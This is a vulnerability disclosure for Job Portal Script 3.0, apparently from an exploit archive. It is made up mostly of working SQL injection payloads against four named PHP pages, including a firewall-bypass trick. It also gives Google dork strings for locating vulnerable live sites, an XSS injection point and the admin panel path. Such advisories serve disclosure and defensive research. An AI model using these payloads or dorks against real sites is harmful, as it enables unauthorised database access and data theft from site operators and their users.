Job Portal Script 3.0 Cross Site Scripting / SQL Injection

Published
Credit
Risk
2017.03.08
Bilal KARDADOU
Medium
CWE
CVE
Local
Remote
CWE-89
CWE-79
N/A
No
Yes
Dork: categorysearch.php?indus=

################################################
#Title: Job portal Script v3.0 - SQL Injection / Cross Site Scripting
#Credit: Bilal KARDADOU
#Vendor: www.jobportalscript.com
#Vendor URL: http://www.jobportalscript.com/index.html
#Product: Job portal site.
#Google Dork: categorysearch.php?indus=
# placementpaper.php?pn= ...
################################################
#
# Product & Service Introduction:
# Job site script is an advanced PHP job script to run your Job portal
site.
# It is a complete script with advance features.#
#
#
#
# --SQL Injection/Exploit--
#
#
localhost/categorysearch.php?indus=A'+/*!50000UNION*/+/*!50000SELECT*/+1,version(),3,4,5,6--
-
# localhost/placementpaper.php?pn=11'
/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,version(),6,7,8,9,10,11,12,13-- -
#
localhost/placement_new.php?type=-2%27%20/*!50000UNION*/+/*!50000SELECT*/+1,version(),3,4,5,6,7,8--%20-
# localhost/training_question.php?cate_id=-3
/*!50000UNION*/+/*!50000SELECT*/+1,2,3,version(),5,6,7-- -
#
# Bypassing WAF with Special Characters...
# ---PoC---
# http://prnt.sc/ehag7j
# http://prnt.sc/ehagg6
# http://prnt.sc/ehagsv
# http://prnt.sc/ehah1p
#
# --(XSS)Cross Site Scripting--
# localhost/categorysearch.php?indus=A[XSS]
# http://prnt.sc/ehaj87
#
# --Panel--
#
# admin/login.php
# Bilal KARDADOU - https://www.linkedin.com/in/bilal-kardadou-21a000127)
################################################

--
*Bilal Kardadou*
IT Security Consultant
*E* : b.kardadou@capvalue.ma | *E* : bilalkardadou@gmail.com |


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com